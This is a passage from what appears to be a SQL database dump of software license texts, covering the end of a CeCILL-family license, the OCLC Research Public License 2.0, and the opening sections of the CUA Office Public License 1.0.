physical medium;\n\n(ii) the first time the Licensee exercises any of the rights granted hereunder.\n\n3.2 One copy of the Agreement, containing a notice relating to the characteristics\nof the Software, to the limited warranty, and to the fact that its use is\nrestricted to experienced users has been provided to the Licensee prior to\nits acceptance as set forth in Article 3.1 hereinabove, and the Licensee hereby\nacknowledges that it has read and understood it.\n\n Article 4 - EFFECTIVE DATE AND TERM\n\n 4.1 EFFECTIVE DATE\n\nThe Agreement shall become effective on the date when it is accepted by the\nLicensee as set forth in Article 3.1.\n\n 4.2 TERM\n\nThe Agreement shall remain in force for the entire legal term of protection\nof the economic rights over the Software.\n\n Article 5 - SCOPE OF RIGHTS GRANTED\n\nThe Licensor hereby grants to the Licensee, who accepts, the following rights\nover the Software for any or all use, and for the term of the Agreement, on\nthe basis of the terms and conditions set forth hereinafter.\n\nBesides, if the Licensor owns or comes to own one or more patents protecting\nall or part of the functions of the Software or of its components, the Licensor\nundertakes not to enforce the rights granted by these patents against successive\nLicensees using, exploiting or modifying the Software. If these patents are\ntransferred, the Licensor undertakes to have the transferees subscribe to\nthe obligations set forth in this paragraph.\n\n 5.1 RIGHT OF USE\n\nThe Licensee is authorized to use the Software, without any limitation as\nto its fields of application, with it being hereinafter specified that this\ncomprises:\n\n1. permanent or temporary reproduction of all or part of the Software by any\nor all means and in any or all form.\n\n2. loading, displaying, running, or storing the Software on any or all medium.\n\n3. entitlement to observe, study or test its operation so as to determine\nthe ideas and principles behind any or all constituent elements of said Software.\nThis shall apply when the Licensee carries out any or all loading, displaying,\nrunning, transmission or storage operation as regards the Software, that it\nis entitled to carry out hereunder.\n\n 5.2 RIGHT OF MODIFICATION\n\nThe right of modification includes the right to translate, adapt, arrange,\nor make any or all modifications to the Software, and the right to reproduce\nthe resulting software. It includes, in particular, the right to create a\nDerivative Software.\n\nThe Licensee is authorized to make any or all modification to the Software\nprovided that it includes an explicit notice that it is the author of said\nmodification and indicates the date of the creation thereof.\n\n 5.3 RIGHT OF DISTRIBUTION\n\nIn particular, the right of distribution includes the right to publish, transmit\nand communicate the Software to the general public on any or all medium, and\nby any or all means, and the right to market, either in consideration of a\nfee, or free of charge, one or more copies of the Software by any means.\n\nThe Licensee is further authorized to distribute copies of the modified or\nunmodified Software to third parties according to the terms and conditions\nset forth hereinafter.\n\n 5.3.1. DISTRIBUTION OF SOFTWARE WITHOUT MODIFICATION\n\nThe Licensee is authorized to distribute true copies of the Software in Source\nCode or Object Code form, provided that said distribution complies with all\nthe provisions of the Agreement and is accompanied by:\n\n 1. a copy of the Agreement,\n\n2. a notice relating to the limitation of both the Licensor\'s warranty and\nliability as set forth in Articles 8 and 9,\n\nand that, in the event that only the Object Code of the Software is redistributed,\nthe Licensee allows effective access to the full Source Code of the Software\nat a minimum during the entire period of its distribution of the Software,\nit being understood that the additional cost of acquiring the Source Code\nshall not exceed the cost of transferring the data.\n\n 5.3.2. DISTRIBUTION OF MODIFIED SOFTWARE\n\nWhen the Licensee makes an Integrated Contribution to the Software, the terms\nand conditions for the distribution of the resulting Modified Software become\nsubject to all the provisions of this Agreement.\n\nThe Licensee is authorized to distribute the Modified Software, in source\ncode or object code form, provided that said distribution complies with all\nthe provisions of the Agreement and is accompanied by:\n\n 1. a copy of the Agreement,\n\n2. a notice relating to the limitation of both the Licensor\'s warranty and\nliability as set forth in Articles 8 and 9,\n\nand that, in the event that only the object code of the Modified Software\nis redistributed, the Licensee allows effective access to the full source\ncode of the Modified Software at a minimum during the entire period of its\ndistribution of the Modified Software, it being understood that the additional\ncost of acquiring the source code shall not exceed the cost of transferring\nthe data.\n\n 5.3.3. DISTRIBUTION OF DERIVATIVE SOFTWARE\n\nWhen the Licensee creates Derivative Software, this Derivative Software may\nbe distributed under a license agreement other than this Agreement, subject\nto compliance with the requirement to include a notice concerning the rights\nover the Software as defined in Article 6.4. In the event the creation of\nthe Derivative Software required modification of the Source Code, the Licensee\nundertakes that:\n\n1. the resulting Modified Software will be governed by this Agreement,\n\n2. the Integrated Contributions in the resulting Modified Software will be\nclearly identified and documented,\n\n3. the Licensee will allow effective access to the source code of the Modified\nSoftware, at a minimum during the entire period of distribution of the Derivative\nSoftware, such that such modifications may be carried over in a subsequent\nversion of the Software; it being understood that the additional cost of purchasing\nthe source code of the Modified Software shall not exceed the cost of transferring\nthe data.\n\n 5.3.4. COMPATIBILITY WITH THE CeCILL LICENSE\n\nWhen a Modified Software contains an Integrated Contribution subject to the\nCeCILL license agreement, or when a Derivative Software contains a Related\nModule subject to the CeCILL license agreement, the provisions set forth in\nthe third item of Article 6.4 are optional.\n\n Article 6 - INTELLECTUAL PROPERTY\n\n 6.1 OVER THE INITIAL SOFTWARE\n\nThe Holder owns the economic rights over the Initial Software. Any or all\nuse of the Initial Software is subject to compliance with the terms and conditions\nunder which the Holder has elected to distribute its work and no one shall\nbe entitled to modify the terms and conditions for the distribution of said\nInitial Software.\n\nThe Holder undertakes that the Initial Software will remain ruled at least\nby this Agreement, for the duration set forth in Article 4.2.\n\n 6.2 OVER THE INTEGRATED CONTRIBUTIONS\n\nThe Licensee who develops an Integrated Contribution is the owner of the intellectual\nproperty rights over this Contribution as defined by applicable law.\n\n 6.3 OVER THE RELATED MODULES\n\nThe Licensee who develops a Related Module is the owner of the intellectual\nproperty rights over this Related Module as defined by applicable law and\nis free to choose the type of agreement that shall govern its distribution\nunder the conditions defined in Article 5.3.3.\n\n 6.4 NOTICE OF RIGHTS\n\n The Licensee expressly undertakes:\n\n1. not to remove, or modify, in any manner, the intellectual property notices\nattached to the Software;\n\n2. to reproduce said notices, in an identical manner, in the copies of the\nSoftware modified or not;\n\n3. to ensure that use of the Software, its intellectual property notices and\nthe fact that it is governed by the Agreement is indicated in a text that\nis easily accessible, specifically from the interface of any Derivative Software.\n\nThe Licensee undertakes not to directly or indirectly infringe the intellectual\nproperty rights of the Holder and/or Contributors on the Software and to take,\nwhere applicable, vis-à-vis its staff, any and all measures required to ensure\nrespect of said intellectual property rights of the Holder and/or Contributors.\n\n Article 7 - RELATED SERVICES\n\n7.1 Under no circumstances shall the Agreement oblige the Licensor to provide\ntechnical assistance or maintenance services for the Software.\n\nHowever, the Licensor is entitled to offer this type of services. The terms\nand conditions of such technical assistance, and/or such maintenance, shall\nbe set forth in a separate instrument. Only the Licensor offering said maintenance\nand/or technical assistance services shall incur liability therefor.\n\n7.2 Similarly, any Licensor is entitled to offer to its licensees, under its\nsole responsibility, a warranty, that shall only be binding upon itself, for\nthe redistribution of the Software and/or the Modified Software, under terms\nand conditions that it is free to decide. Said warranty, and the financial\nterms and conditions of its application, shall be subject of a separate instrument\nexecuted between the Licensor and the Licensee.\n\n Article 8 - LIABILITY\n\n8.1 Subject to the provisions of Article 8.2, the Licensee shall be entitled\nto claim compensation for any direct loss it may have suffered from the Software\nas a result of a fault on the part of the relevant Licensor, subject to providing\nevidence thereof.\n\n8.2 The Licensor\'s liability is limited to the commitments made under this\nAgreement and shall not be incurred as a result of in particular: (i) loss\ndue the Licensee\'s total or partial failure to fulfill its obligations, (ii)\ndirect or consequential loss that is suffered by the Licensee due to the use\nor performance of the Software, and (iii) more generally, any consequential\nloss. In particular the Parties expressly agree that any or all pecuniary\nor business loss (i.e. loss of data, loss of profits, operating loss, loss\nof customers or orders, opportunity cost, any disturbance to business activities)\nor any or all legal proceedings instituted against the Licensee by a third\nparty, shall constitute consequential loss and shall not provide entitlement\nto any or all compensation from the Licensor.\n\n Article 9 - WARRANTY\n\n9.1 The Licensee acknowledges that the scientific and technical state-of-the-art\nwhen the Software was distributed did not enable all possible uses to be tested\nand verified, nor for the presence of possible defects to be detected. In\nthis respect, the Licensee\'s attention has been drawn to the risks associated\nwith loading, using, modifying and/or developing and reproducing the Software\nwhich are reserved for experienced users.\n\nThe Licensee shall be responsible for verifying, by any or all means, the\nsuitability of the product for its requirements, its good working order, and\nfor ensuring that it shall not cause damage to either persons or properties.\n\n9.2 The Licensor hereby represents, in good faith, that it is entitled to\ngrant all the rights over the Software (including in particular the rights\nset forth in Article 5).\n\n9.3 The Licensee acknowledges that the Software is supplied \"as is\" by the\nLicensor without any other express or tacit warranty, other than that provided\nfor in Article 9.2 and, in particular, without any warranty as to its commercial\nvalue, its secured, safe, innovative or relevant nature.\n\nSpecifically, the Licensor does not warrant that the Software is free from\nany error, that it will operate without interruption, that it will be compatible\nwith the Licensee\'s own equipment and software configuration, nor that it\nwill meet the Licensee\'s requirements.\n\n9.4 The Licensor does not either expressly or tacitly warrant that the Software\ndoes not infringe any third party intellectual property right relating to\na patent, software or any other property right. Therefore, the Licensor disclaims\nany and all liability towards the Licensee arising out of any or all proceedings\nfor infringement that may be instituted in respect of the use, modification\nand redistribution of the Software. Nevertheless, should such proceedings\nbe instituted against the Licensee, the Licensor shall provide it with technical\nand legal assistance for its defense. Such technical and legal assistance\nshall be decided on a case-by-case basis between the relevant Licensor and\nthe Licensee pursuant to a memorandum of understanding. The Licensor disclaims\nany and all liability as regards the Licensee\'s use of the name of the Software.\nNo warranty is given as regards the existence of prior rights over the name\nof the Software or as regards the existence of a trademark.\n\n Article 10 - TERMINATION\n\n10.1 In the event of a breach by the Licensee of its obligations hereunder,\nthe Licensor may automatically terminate this Agreement thirty (30) days after\nnotice has been sent to the Licensee and has remained ineffective.\n\n10.2 A Licensee whose Agreement is terminated shall no longer be authorized\nto use, modify or distribute the Software. However, any licenses that it may\nhave granted prior to termination of the Agreement shall remain valid subject\nto their having been granted in compliance with the terms and conditions hereof.\n\n Article 11 - MISCELLANEOUS\n\n 11.1 EXCUSABLE EVENTS\n\nNeither Party shall be liable for any or all delay, or failure to perform\nthe Agreement, that may be attributable to an event of force majeure, an act\nof God or an outside cause, such as defective functioning or interruptions\nof the electricity or telecommunications networks, network paralysis following\na virus attack, intervention by government authorities, natural disasters,\nwater damage, earthquakes, fire, explosions, strikes and labor unrest, war,\netc.\n\n11.2 Any failure by either Party, on one or more occasions, to invoke one\nor more of the provisions hereof, shall under no circumstances be interpreted\nas being a waiver by the interested Party of its right to invoke said provision(s)\nsubsequently.\n\n11.3 The Agreement cancels and replaces any or all previous agreements, whether\nwritten or oral, between the Parties and having the same purpose, and constitutes\nthe entirety of the agreement between said Parties concerning said purpose.\nNo supplement or modification to the terms and conditions hereof shall be\neffective as between the Parties unless it is made in writing and signed by\ntheir duly authorized representatives.\n\n11.4 In the event that one or more of the provisions hereof were to conflict\nwith a current or future applicable act or legislative text, said act or legislative\ntext shall prevail, and the Parties shall make the necessary amendments so\nas to comply with said act or legislative text. All other provisions shall\nremain effective. Similarly, invalidity of a provision of the Agreement, for\nany reason whatsoever, shall not cause the Agreement as a whole to be invalid.\n\n 11.5 LANGUAGE\n\nThe Agreement is drafted in both French and English and both versions are\ndeemed authentic.\n\n Article 12 - NEW VERSIONS OF THE AGREEMENT\n\n12.1 Any person is authorized to duplicate and distribute copies of this Agreement.\n\n12.2 So as to ensure coherence, the wording of this Agreement is protected\nand may only be modified by the authors of the License, who reserve the right\nto periodically publish updates or new versions of the Agreement, each with\na separate number. These subsequent versions may address new issues encountered\nby Free Software.\n\n12.3 Any Software distributed under a given version of the Agreement may only\nbe subsequently distributed under the same version of the Agreement or a subsequent\nversion.\n\n Article 13 - GOVERNING LAW AND JURISDICTION\n\n13.1 The Agreement is governed by French law. The Parties agree to endeavor\nto seek an amicable solution to any disagreements or disputes that may arise\nduring the performance of the Agreement.\n\n13.2 Failing an amicable solution within two (2) months as from their occurrence,\nand unless emergency proceedings are necessary, the disagreements or disputes\nshall be referred to the Paris Courts having jurisdiction, by the more diligent\nParty.\n\nVersion 1.0 dated 2006-09-05. 1 CeCILL stands for Ce(a) C(nrs) I(nria) L(ogiciel)\nL(ibre)\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(67,'OCLC-2.0','OCLC Research Public License 2.0\n\nTerms & Conditions Of Use\n\nMay, 2002\n\nCopyright © 2002. OCLC Online Computer Library Center, Inc. All Rights Reserved\n\nPLEASE READ THIS DOCUMENT CAREFULLY. BY DOWNLOADING OR USING THE CODE BASE\nAND/OR DOCUMENTATION ACCOMPANYING THIS LICENSE (THE \"License\"), YOU AGREE\nTO THE FOLLOWING TERMS AND CONDITIONS OF THIS LICENSE.\n\nSection 1. Your Rights\n\nSubject to these terms and conditions of this License, the OCLC Office of\nResearch (the \"Original Contributor\") and each subsequent contributor (collectively\nwith the Original Contributor, the \"Contributors\") hereby grant you a non-exclusive,\nworldwide, no-charge, transferable license to execute, prepare derivative\nworks of, and distribute (internally and externally), for commercial and noncommercial\npurposes, the original code contributed by Original Contributor and all Modifications\n(collectively called the \"Program\").\n\nSection 2. Definitions\n\nA \"Modification\" to the Program is any addition to or deletion from the contents\nof any file of the Program and any new file that contains any part of the\nProgram. If you make a Modification and distribute the Program externally\nyou are a \"Contributor.\" The distribution of the Program must be under the\nterms of this license including those in Section 3 below.\n\nA \"Combined Work\" results from combining and integrating all or parts of the\nProgram with other code. A Combined Work may be thought of as having multiple\nparents or being result of multiple lines of code development.\n\nSection 3. Distribution Licensing Terms\n\n A. General Requirements\n\nExcept as necessary to recognize third-party rights or third-party restriction\n(see below), a distribution of the Program in any of the forms listed below\nmust not put any further restrictions on the recipient\'s exercise of the rights\ngranted herein.\n\nAs a Contributor, you represent that your Modification(s) are your original\ncreation(s) and, to the best of your knowledge, no third party has any claim\n(including but not limited to intellectual property claims) relating to your\nModification(s). You represent that each of your Modifications includes complete\ndetails of any third-party right or other third-party restriction associated\nwith any part of your Modification (including a copy of any applicable license\nagreement).\n\nThe Program must be distributed without charge beyond the costs of physically\ntransferring the files to the recipient.\n\nThis Warranty Disclaimer/Limitation of Liability must be prominently displayed\nwith every distribution of the Program in any form:\n\nYOU AGREE THAT THE PROGRAM IS PROVIDED AS-IS, WITHOUT WARRANTY OF ANY KIND\n(EITHER EXPRESS OR IMPLIED). ACCORDINGLY, OCLC MAKES NO WARRANTIES, REPRESENTATIONS\nOR GUARANTEES, EITHER EXPRESS OR IMPLIED, AND DISCLAIMS ALL SUCH WARRANTIES,\nREPRESENTATIONS OR GUARANTEES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR ANY PARTICULAR PURPOSE, AS TO:\n(A) THE FUNCTIONALITY OR NONINFRINGEMENT OF PROGRAM, ANY MODIFICATION, A COMBINED\nWORK OR AN AGGREGATE WORK; OR (B) THE RESULTS OF ANY PROJECT UNDERTAKEN USING\nTHE PROGRAM, ANY MODIFICATION, A COMBINED WORK OR AN AGGREGATE WORK. IN NO\nEVENT SHALL THE CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, CONSEQUENTIAL OR ANY OTHER DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,\nOR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THE PROGRAM, EVEN IF ADVISED\nOF THE POSSIBILITY OF SUCH DAMAGES. YOU HEREBY WAIVE ANY CLAIMS FOR DAMAGES\nOF ANY KIND AGAINST CONTRIBUTORS WHICH MAY RESULT FROM YOUR USE OF THE PROGRAM.\n\n B. Requirements for a Distribution of Modifiable Code\n\nIf you distribute the Program in a form to which the recipient can make Modifications\n(e.g. source code), the terms of this license apply to use by recipient. In\naddition, each source and data file of the Program and any Modification you\ndistribute must contain the following notice:\n\n\" Copyright (c) 2000- (insert then current year) OCLC Online Computer Library\nCenter, Inc. and other contributors . All rights reserved. The contents of\nthis file, as updated from time to time by the OCLC Office of Research, are\nsubject to OCLC Research Public License Version 2.0 (the \"License\"); you may\nnot use this file except in compliance with the License. You may obtain a\ncurrent copy of the License at http://purl.oclc.org/oclc/research/ORPL/. Software\ndistributed under the License is distributed on an \"AS IS\" basis, WITHOUT\nWARRANTY OF ANY KIND, either express or implied. See the License for the specific\nlanguage governing rights and limitations under the License. This software\nconsists of voluntary contributions made by many individuals on behalf of\nOCLC Research. For more information on OCLC Research, please see http://www.oclc.org/research/.\nThe Original Code is ______________________________ . The Initial Developer\nof the Original Code is ________________________ . Portions created by ______________________\nare Copyright (C) ____________________________ . All Rights Reserved. Contributor(s):\n______________________________________ . \"\n\n C. Requirements for a Distribution of Non-modifiable Code\n\nIf you distribute the Program in a form to which the recipient cannot make\nModifications (e.g. object code), the terms of this license apply to use by\nrecipient and you must include the following statement in appropriate and\nconspicuous locations:\n\n\"Copyright (c) 2000- (insert then current year) OCLC Online Computer Library\nCenter, Inc. and other contributors. All rights reserved.\"\n\nIn addition, the source code must be included with the object code distribution\nor the distributor must provide the source code to the recipient upon request.\n\n D. Requirements for a Combined Work Distribution\n\nDistributions of Combined Works are subject to the terms of this license and\nmust be made at no charge to the recipient beyond the costs of physically\ntransferring the files to recipient.\n\nA Combined Work may be distributed as either modifiable or non-modifiable\ncode. The requirements of Section 3.B or 3.C above (as appropriate) apply\nto such distributions.\n\nAn \"Aggregate Work\" is when the Program exists, without integration, with\nother programs on a storage medium. This License does not apply to portions\nof an Aggregate Work which are not covered by the definition of \"Program\"\nprovided in this License. You are not forbidden from selling an Aggregate\nWork. However, the Program contained in an Aggregate Work is subject to this\nLicense. Also, should the Program be extracted from an Aggregate Work, this\nLicense applies to any use of the Program apart from the Aggregate Work.\n\n Section 4. License Grant\n\nFor purposes of permitting use of your Modifications by OCLC and other licensees\nhereunder, you hereby grant to OCLC and such other licensees the non-exclusive,\nworldwide, royalty-free, transferable, sublicenseable license to execute,\ncopy, alter, delete, modify, adapt, change, revise, enhance, develop, publicly\ndisplay, distribute (internally and externally) and/or create derivative works\nbased on your Modifications (and derivative works thereof) in accordance with\nthese Terms. This Section 4 shall survive termination of this License for\nany reason.\n\nSection 5. Termination of Rights\n\nThis non-exclusive license (with respect to the grant from a particular Contributor)\nautomatically terminates for any entity that initiates legal action for intellectual\nproperty infringement (with respect to the Program) against such Contributor\nas of the initiation of such action.\n\nIf you fail to comply with this License, your rights (but not your obligations)\nunder this License shall terminate automatically unless you cure such breach\nwithin thirty (30) days of becoming aware of the noncompliance. All sublicenses\ngranted by you which preexist such termination and are properly granted shall\nsurvive such termination.\n\nSection 6. Other Terms\n\nExcept for the copyright notices required above, you may not use any trademark\nof any of the Contributors without the prior written consent of the relevant\nContributor. You agree not to remove, alter or obscure any copyright or other\nproprietary rights notice contained in the Program.\n\nAll transfers of the Program or any part thereof shall be made in compliance\nwith U.S. import/export regulations or other restrictions of the U.S. Department\nof Commerce, as well as other similar trade or commerce restrictions which\nmight apply.\n\nAny patent obtained by any party covering the Program or any part thereof\nmust include a provision providing for the free, perpetual and unrestricted\ncommercial and noncommercial use by any third party.\n\nIf, as a consequence of a court judgment or settlement relating to intellectual\nproperty infringement or any other cause of action, conditions are imposed\non you that contradict the conditions of this License, such conditions do\nnot excuse you from compliance with this License. If you cannot distribute\nthe Program so as to simultaneously satisfy your obligations under this License\nand such other conditions, you may not distribute the Program at all. For\nexample, if a patent license would not permit royalty-free redistribution\nof the Program by all those who receive copies directly or indirectly through\nyou, you could not satisfy both the patent license and this License, and you\nwould be required to refrain entirely from distribution of the Program.\n\nIf you learn of a third party claim or other restriction relating to a Program\nyou have already distributed you shall promptly redo your Program to address\nthe issue and take all reasonable steps to inform those who may have received\nthe Program at issue. An example of an appropriate reasonable step to inform\nwould be posting an announcement on an appropriate web bulletin board.\n\nThe provisions of this License are deemed to be severable, and the invalidity\nor unenforceability of any provision shall not affect or impair the remaining\nprovisions which shall continue in full force and effect. In substitution\nfor any provision held unlawful, there shall be substituted a provision of\nsimilar import reflecting the original intent of the parties hereto to the\nextent permissible under law.\n\nThe Original Contributor from time to time may change this License, and the\namended license will apply to all copies of the Program downloaded after the\nnew license is posted. This License grants only the rights expressly stated\nherein and provides you with no implied rights or licenses to the intellectual\nproperty of any Contributor.\n\nThis License is the complete and exclusive statement of the agreement between\nthe parties concerning the subject matter hereof and may not be amended except\nby the written agreement of the parties. This License shall be governed by\nand construed in accordance with the laws of the State of Ohio and the United\nStates of America, without regard to principles of conflicts of law.\n','2020-08-04 08:07:01','2020-08-04 08:07:01',0),(68,'CUA-OPL-1.0','CUA Office Public License Version 1.0\n\n 1. Definitions.\n\n1.0.1. \"Commercial Use\" means distribution or otherwise making the Covered\nCode available to a third party.\n\n1.1. \"Contributor\" means each entity that creates or contributes to the creation\nof Modifications.\n\n1.2. \"Contributor Version\" means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.3. \"Covered Code\" means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof.\n\n1.4. \"Electronic Distribution Mechanism\" means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n 1.5. \"Executable\" means Covered Code in any form other than Source Code.\n\n1.6. \"Initial Developer\" means the individual or entity identified as the\nInitial Developer in the Source Code notice required by Exhibit A.\n\n1.7. \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n 1.8. \"License\" means this document.\n\n1.8.1. \"Licensable\" means having the right to grant, to the maximum extent\npossible, whether at the time of the initial grant or subsequently acquired,\nany and all of the rights conveyed herein.\n\n1.9. \"Modifications\" means any addition to or deletion from the substance\nor structure of either the Original Code or any previous Modifications. When\nCovered Code is released as a series of files, a Modification is:\n\nA. Any addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nB. Any new file that contains any part of the Original Code or previous Modifications.\n\n1.10. \"Original Code\" means Source Code of computer software code which is\ndescribed in the Source Code notice required by Exhibit A as Original Code,\nand which, at the time of its release under this License is not already Covered\nCode governed by this License.\n\n1.10.1. \"Patent Claims\" means any patent claim(s), now owned or hereafter\nacquired, including without limitation, method, process, and apparatus claims,\nin any patent Licensable by grantor.\n\n1.11. \"Source Code\" means the preferred form of the Covered Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof an Executable, or source code differential comparisons against either the\nOriginal Code or another well known, available Covered Code of the Contributor\'s\nchoice. The Source Code can be in a compressed or archival form, provided\nthe appropriate decompression or de-archiving software is widely available\nfor no charge.\n\n1.12. \"You\" (or \"Your\") means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License or a future version\nof this License issued under Section 6.1. For legal entities, \"You\" includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, \"control\" means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of more than fifty percent (50%)\nof the outstanding shares or beneficial ownership of such entity.\n\n 2. Source Code License.\n\n2.1. The Initial Developer Grant. The Initial Developer hereby grants You\na world-wide, royalty-free, non-exclusive license, subject to third party\nintellectual property claims:\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Initial Developer to use, reproduce, modify, display, perform, sublicense\nand distribute the Original Code (or portions thereof) with or without Modifications,\nand/or as part of a Larger Work; and\n\n(b) under Patents Claims infringed by the making, using or selling of Original\nCode, to make, have made, use, practice, sell, and offer for sale, and/or\notherwise dispose of the Original Code (or portions thereof).\n\n(c) the licenses granted in this Section 2.1(a) and (b) are effective on the\ndate Initial Developer first distributes Original Code under the terms of\nthis License.\n\n(d) Notwithstanding Section 2.1(b) above, no patent license is granted: 1)\nfor code that You delete from the Original Code; 2) separate from the Original\nCode; or 3) for infringements caused by: i) the modification of the Original\nCode or ii) the combination of the Original Code with other software or devices.\n\n2.2. Contributor Grant. Subject to third party intellectual property claims,\neach Contributor hereby grants You a world-wide, royalty-free, non-exclusive\nlicense\n\n(a) under intellectual property rights (other than patent or trademark) Licensable\nby Contributor, to use, reproduce, modify, display, perform, sublicense and\ndistribute the Modifications created by such Contributor (or portions thereof)\neither on an unmodified basis, with other Modifications, as Covered Code and/or\nas part of a Larger Work; and\n\n(b) under Patent Claims infringed by the making, using, or selling of Modifications\nmade by that Contributor either alone and/or in combination with its Contributor\nVersion (or portions of such combination), to make, use, sell, offer for sale,\nhave made, and/or otherwise dispose of: 1) Modifications made by that Contributor\n(or portions thereof); and 2) the combination of Modifications made by that\nContributor with its Contributor Version (or portions of such combination).\n\n(c) the licenses granted in Sections 2.2(a) and 2.2(b) are effective on the\ndate Contributor first makes Commercial Use of the Covered Code.\n\n(d) Notwithstanding Section 2.2(b) above, no patent license is granted: 1)\nfor any code that Contributor has deleted from the Contributor Version; 2)\nseparate from the Contributor Version; 3) for infringements caused by: i)\nthird party modifications of Contributor Version or ii) the combination of\nModifications made by that Contributor with other software (except as part\nof the Contributor Version) or other devices; or 4) under Patent Claims infringed\nby Covered Code in the absence of Modifications made by that Contributor.\n\n 3. Distribution Obligations.\n\n3.1. Application of License. The Modifications which You create or to which\nYou contribute are governed by the terms of this License, including without\nlimitation Section 2.2. The Source Code version of Covered Code may be distributed\nonly under the terms of this License or a future version of this License released\nunder Section 6.1, and You must include a copy of this License with every\ncopy of the Source Code You distribute. You may not offer or impose any terms\non any Source Code version that alters or restricts the applicable version\nof this License or the recipients\' rights hereunder. However, You may include\nan additional document offering the additional rights described in Section\n3.5.\n\n3.2. Availability of Source Code. Any Modification which You create or to\nwhich You contribute must be made available in Source Code form under the\nterms of this License either on the same media as an Executable version or\nvia an accepted Electronic Distribution Mechanism to anyone to whom you made\nan Executable version available; and if made available via Electronic Distribution\nMechanism, must remain available for at least twelve (12) months after the\ndate it initially became available, or at least six (6) months after a subsequent\nversion of that particular Modification has been made available to such recipients.\nYou are responsible for ensuring that the Source Code version remains available\neven if the Electronic Distribution Mechanism is maintained by a third party.\n\n3.3. Description of Modifications. You must cause all Covered Code to which\nYou contribute to contain a file documenting the changes You made to create\nthat Covered Code and the date of any change. You must include a prominent\nstatement that the Modification is derived, directly or indirectly, from Original\nCode provided by the Initial Developer and including the name of the Initial\nDeveloper in (a) the Source Code, and (b) in any notice in an Executable version\nor related documentation in which You describe the origin or ownership of\nthe Covered Code.\n\n 3.4. Intellectual Property Matters\n\n(a) Third Party Claims. If Contributor has knowledge that a license under\na third party\'s intellectual property rights is required to exercise the rights\ngranted by such Contributor under Sections 2.1 or 2.2, Contributor must include\na text file with the Source Code distribution titled \"LEGAL\" which describes\nthe claim and the party making the claim in sufficient detail that a recipient\nwill know whom to contact. If Contributor obtains such knowledge after the\nModification is made available as described in Section 3.2, Contributor shall\npromptly modify the LEGAL file in all copies Contributor makes available thereafter\nand shall take other steps (such as notifying appropriate mailing lists or\nnewsgroups) reasonably calculated to inform those who received the Covered\nCode that new knowledge has been obtained.\n\n(b) Contributor APIs. If Contributor\'s Modifications include an application\nprogramming interface and Contributor has knowledge of patent licenses which\nare reasonably necessary to implement that API, Contributor must also include\nthis information in the LEGAL file.\n\n(c) Representations. Contributor represents that, except as disclosed pursuant\nto Section 3.4(a) above, Contributor believes that Contributor\'s Modifications\nare Contributor\'s original creation(s) and/or Contributor has sufficient rights\nto grant the rights conveyed by this License.\n\n3.5. Required Notices. You must duplicate the notice in Exhibit A in each\nfile of the Source Code. If it is not possible to put such notice in a particular\nSource Code file due to its structure, then You must include such notice in\na location (such as a relevant directory) where a user would be likely to\nlook for such a notice. If You created one or more Modification(s) You may\nadd your name as a Contributor to the notice described in Exhibit A. You must\nalso duplicate this License in any documentation for the Source Code where\nYou describe recipients\' rights or ownership rights relating to Covered Code.\nYou may choose to offer, and to charge a fee for, warranty, support, indemnity\nor liability obligations to one or more recipients of Covered Code. However,\nYou may do so only on Your own behalf, and not on behalf of the Initial Developer\nor any Contributor. You must make it absolutely clear than any such warranty,\nsupport, indemnity or liability obligation is offered by You alone, and You\nhereby agree to indemnify the Initial Developer and every Contributor for\nany liability incurred by the Initial Developer or such Contributor as a result\nof warranty, support, indemnity or liability terms You offer.\n\n3.6. Distribution of Executable Versions. You may distribute Covered Code\nin Executable form only if the requirements of Section 3.1-3.5 have been met\nfor that Covered Code, and if You include a notice stating that the Source\nCode version of the Covered Code is available under the terms of this License,\nincluding a description of how and where You have fulfilled the obligations\nof Section 3.2. The notice must be conspicuously included in any notice in\nan Executable version, related documentation or collateral in which You describe\nrecipients\' rights relating to the Covered Code. You may distribute the Executable\nversion of Covered Code or ownership rights under a license of Your choice,\nwhich may contain terms different from this License, provided that You are\nin compliance with the terms of this License and that the license for the\nExecutable version does not attempt to limit or alter the recipient\'s rights\nin the Source Code version from the rights set forth in this License. If You\ndistribute the Executable version under a different license You must make\nit absolutely clear that any terms which differ from this License are offered\nby You alone, not by the Initial Developer or any Contributor. You hereby\nagree to indemnify the Initial Developer and every Contributor for any liability\nincurred by the Initial Developer or such Contributor as a result of any such\nterms You offer.\n\n3.7. Larger Works. You may create a Larger Work by combining Covered Code\nwith other code not governed by the terms of this License and distribute the\nLarger Work as a single product. In such a case, You must make sure the requirements\nof this License are fulfilled for the Covered Code.\n\n 4. Inability to Comply Due to Statute or Regulation.\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Code due to statute, judicial order,\nor regulation then You must: (a) comply with the terms of this License to\nthe maximum extent possible; and (b) describe the limitations and the code\nthey affect. Such description must be included in the LEGAL file described\nin Section 3.4 and must be included with all distributions of the Source Code.\nExcept to the extent prohibited by statute or regulation, such description\nmust be sufficiently detailed for a recipient of ordinary skill to be able\nto understand it.\n\n 5. Application of this License.\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A and to related Covered Code.\n\n 6. Versions of the License.\n\n6.1. New Versions. CUA Office Project may publish revised and/or new versions\nof the License from time to time. Each version will be given a distinguishing\nversion number.\n\n6.2. Effect of New Versions. Once 